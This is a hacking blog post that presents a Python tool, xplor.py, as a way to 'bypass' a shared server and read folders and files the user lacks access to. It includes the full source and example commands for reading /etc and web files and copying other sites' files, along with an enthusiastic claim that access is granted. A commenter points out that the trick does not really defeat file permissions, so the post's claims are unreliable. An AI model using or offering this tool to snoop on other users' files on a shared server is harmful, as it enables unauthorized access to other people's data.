Let's go with next method of symlink server bypassing , like u see and into before post now i will explain a new trick with an other tool.
http://www.flashcrew.in/2012/05/server-bypass-via-symlink-jumping-in.html
-------------------------
Here we will talk about an other tool who use python permission to read other folders/ files in same server.
Tool called xplor.py and here it's the source
#!/usr/bin/env python
# devilzc0de.org (c) 2012
import sys
import os
def copyfile(source, dest, buffer_size=1024*1024):
if not hasattr(source, 'read'):
source = open(source, 'rb')
if not hasattr(dest, 'write'):
dest = open(dest, 'wb')
while 1:
copy_buffer = source.read(buffer_size)
if copy_buffer:
dest.write(copy_buffer)
else:
break
source.close()
dest.close()
if __name__=="__main__":
if not len(sys.argv) == 3 and not len(sys.argv) == 2:
sys.stdout.write('usage : python ' + os.path.basename(sys.argv[0]) + ' [path to dir/file] [path to save file]\r\n')
sys.stdout.write('ex : python ' + os.path.basename(sys.argv[0]) + ' /etc\r\n')
sys.stdout.write('ex : python ' + os.path.basename(sys.argv[0]) + ' /etc/issue\r\n')
sys.stdout.write('ex : python ' + os.path.basename(sys.argv[0]) + ' /etc/issue issue_new_copy\r\n')
sys.exit(1)
target = sys.argv[1].replace("\\","/")
if os.path.isdir(target):
if not target.endswith("/"):
target = target + "/"
dir = os.listdir(target)
for d in dir:
fs = ""
if os.path.isdir(target + d):
fs = "[ DIR ]"
elif os.path.isfile(target + d):
fs = os.path.getsize(target + d)
fs = str(fs)
sys.stdout.write(fs.rjust(12, " ") + " " + d + "\r\n")
elif os.path.isfile(target):
if len(sys.argv) == 3:
copyfile(target, sys.argv[2])
else:
f = open(target, "rb")
try:
byte = f.read(1024)
sys.stdout.write(byte)
sys.stdout.flush()
while byte != "":
byte = f.read(1024)
sys.stdout.write(byte)
sys.stdout.flush()
finally:
f.close()
else:
sys.stdout.write("Can't found file or folder : " + target)
http://pastebin.com/WqmCE2sJ
testing the script python xplor.py
User the tool to view folders where not have any permission to read inside
python xplor.py /var/www/index.php
View the files in no access folder .
python xplor.py /var/www/index.php
copy/ save ur file
python xplor.py /var/www/indro/ketek.jpg ketek.jpg
And yeah file it's here
Yeahh fucking access it's granted
Some thing u can do with those other scripts in perl
webs.pl
and
xplor.pl
enjoy it :)
1 comments:
Still, if the user running the command dont have enough permission to read a specific file then this wont work. This is also true because you need to be root to execute the ln command.
Post a Comment